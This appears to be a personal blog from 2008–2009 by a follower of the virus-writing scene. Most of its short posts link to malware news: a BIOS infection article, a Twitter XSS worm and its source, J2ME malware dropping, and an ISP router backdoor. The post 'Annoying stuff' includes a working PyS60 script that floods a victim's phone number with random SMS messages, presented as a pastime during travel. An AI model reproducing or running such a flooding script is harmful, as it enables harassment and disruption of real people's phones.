Persistent bios infection

June 14th, 2009

Phrack#66 is out and it contains a very nice article about injecting your own code in the BIOS eeprom.
You can read it here.

Yet an other XSS worm

April 13th, 2009

It seems that a XSS worm is spreading among twitter users … here more details.
You can find the src code of the worm here.

Annoying stuff

April 11th, 2009

How to spend your time during a long travel:

# flood a victim telephone with random generated sms (for pys60)
import messaging
import appuifw
import random

def rnd():
return random.randint(97,97+26)

num=appuifw.query(u”telephone number?”,”text”)
cnt=appuifw.query(u”how many?”,”number”)

while abs(cnt)>0:
testo=chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())+chr(rnd())
messaging.sms_send(num,testo)
cnt=cnt-1
print “sent: “+testo

April 5th, 2009

I am still alive …

A bit of relax for me …

February 11th, 2009

After this hard session of exams I will come back with some new ideas and code … just one exam left!

Abusing of J2ME

November 30th, 2008

An interesting paper has been published on milw0rm.
It is about using the j2me framework to drop windows malwares …
The idea is cool and I think it can be improved and/or expanded.

Being busy…

November 19th, 2008

Is SPTH coming back to scene?

October 30th, 2008

SPTH has published a nice article on his site. Is he thinking to come back to vx scene?

Backdoor from my ISP

October 15th, 2008

An evil backdoor has been discovered in some ADSL routers given by Telecom Italia for the ADSL service called “alice”.  You can read all the details here.
Do they want to control us all?

A surprising thing …

September 29th, 2008

I have just got a worm in the last place where you can think that something like this can happen … in the university faculty of engineering where I study.

Here the beasty